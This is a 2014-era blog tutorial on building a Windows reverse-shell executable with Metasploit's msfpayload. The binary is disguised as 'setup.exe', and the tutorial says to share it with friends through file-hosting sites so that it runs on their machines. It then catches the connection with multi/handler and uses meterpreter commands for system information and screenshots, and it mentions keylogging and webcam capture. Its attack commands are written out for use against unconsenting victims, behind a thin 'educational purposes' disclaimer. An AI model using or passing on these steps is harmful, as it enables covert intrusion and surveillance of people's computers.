Yesterday i posted Exploiting Windows Os using java signed applet code execution to exploiting a windows vulnerability to logging into the system with out username and password using Metasploit.


Today we going to create our own  payload in an executable binary  to hack windows os.


let’s look at how to create stand-alone Metasploit binary payloads with msfpayload. For starters, we’ll create a simple reverse shell that connects back to the attacker and spawns a command shell. We’ll use msfpayload and windows/shell_reverse_tcp. But first, let’s look at the available options for the shell_reverse_tcp payload using the O flag.



#msfpayload windows/shell_reverse_tcp  O


Screenshot from 2014-05-23 15:23:13




Now let’s run msfpayload again and provide the options needed to create this payload in the Windows Portable Executable (PE) format. To do so, we provide the X option as shown at as our output format.




#msfpayload windows/shell_reverse_tcp LHOST=   LPORT=666   X > /home/sathish/setup.exe



Screenshot from 2014-05-09 16:11:39



Check the executable file is present in the following path



#file /home/sathish/setup.exe



Screenshot from 2014-05-23 14:15:57




Now, you need to upload this file, which in this case is setup.exe, to any file uploading and sharing site such as MediaFire or 4shared and then tell this download link of your file to your friends and let them download it





Now we have a working executable, so we can start a listener with the multi/handler module in msfconsole. multi/handler allows Metasploit to listen

for reverse connections.





Screenshot from 2014-05-21 13:14:19





#msf > use exploit/multi/handler


#msf exploit(handler) > show options


#msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp



#msf exploit(handler) > set LHOST


#msf exploit(handler) > set LPORT 666



We first use the multi/handler module at and get a quick display of the options at . Then, we set our payload to be a Windows reverse shell at so

that it matches the behavior of the executable we created earlier, tell it the IP at and the port to listen on at , and we’re ready to go.


#msf exploit(handler) > exploit



Screenshot from 2014-05-09 16:52:19




Once the victim has downloaded the file and has installed the file and has run it on his computer then you will see the responses on your computer.


Then this will create a channel and  you can access the Windows and Now you will see that you access to the C drive of the victims computer, basically the drive on which the OS is installed on. So if you want then type sysinfo to get the system information about the victims computer.


#meterpreter >  sysinfo



#meterpreter > screenshot



Screenshot from 2014-05-09 16:58:44


It will the screenshot of current window desktop.There are also other meterpreter commands like  record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.



Screenshot from 2014-05-09 17:00:12



One more thing that this all thing are happen only when firewall and Antivirus  is disabled in victims computer.


This tutorial is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine.